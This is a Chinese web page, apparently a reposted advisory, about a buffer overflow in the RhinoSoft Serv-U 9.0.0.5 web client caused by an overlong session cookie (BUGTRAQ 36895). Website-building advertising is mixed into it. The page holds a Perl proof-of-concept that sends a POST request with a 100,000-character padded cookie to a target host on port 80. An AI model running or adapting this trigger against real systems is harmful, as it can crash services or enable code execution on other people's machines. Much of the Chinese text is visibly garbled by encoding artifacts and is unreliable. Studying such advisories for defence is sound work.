新聞中心
Serv-U Web客戶(hù)端HTTP請(qǐng)求遠(yuǎn)程溢出漏洞

成都創(chuàng)新互聯(lián)-專(zhuān)業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性?xún)r(jià)比涼城網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式?jīng)龀蔷W(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋涼城地區(qū)。費(fèi)用合理售后完善,10年實(shí)體公司更值得信賴(lài)。
影響版本:
RhinoSoft Serv-U 9.0.0.5
漏洞描述:
BUGTRAQ ID: 36895
Serv-U FTP是一款FTP服務(wù)程序。
Serv-U產(chǎn)品捆綁有一個(gè)簡(jiǎn)單的基于瀏覽器的傳輸客戶(hù)端,這個(gè)客戶(hù)端在處理超長(zhǎng)的會(huì)話(huà)Cookie時(shí)存在緩沖區(qū)溢出漏洞。如果用戶(hù)受騙連接到了惡意服務(wù)器并向WebClient HTTP服務(wù)返回了超長(zhǎng)的會(huì)話(huà)Cookie,就可能觸發(fā)這個(gè)溢出,導(dǎo)致在用戶(hù)機(jī)器上執(zhí)行任意指令。
---snip---
use IO::Socket;
$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";
while (<$sock>) {
print;
}
---snip---
|
本文名稱(chēng):Serv-UWeb客戶(hù)端HTTP請(qǐng)求遠(yuǎn)程溢出漏洞
地址分享:http://www.5511xx.com/article/dhsgdgc.html


咨詢(xún)
建站咨詢(xún)
